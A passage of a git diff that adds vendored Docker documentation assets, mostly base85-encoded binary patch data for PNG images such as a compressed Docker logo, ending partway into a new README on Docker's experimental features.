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 literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png b/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png new file mode 100644 index 0000000000000000000000000000000000000000..717d09d773cc46ff8297d06f66d9aa855453f35a GIT binary patch literal 4972 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 IT4fCOKM4~1IsgCw literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/experimental/README.md b/vendor/github.com/docker/docker/experimental/README.md new file mode 100644 index 0000000000..b57a5d1294 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/README.md @@ -0,0 +1,44 @@ +# Docker Experimental Features + +This page contains a list of features in the Docker engine which are +experimental. Experimental features are **not** ready for production. They are +provided for test and evaluation in your 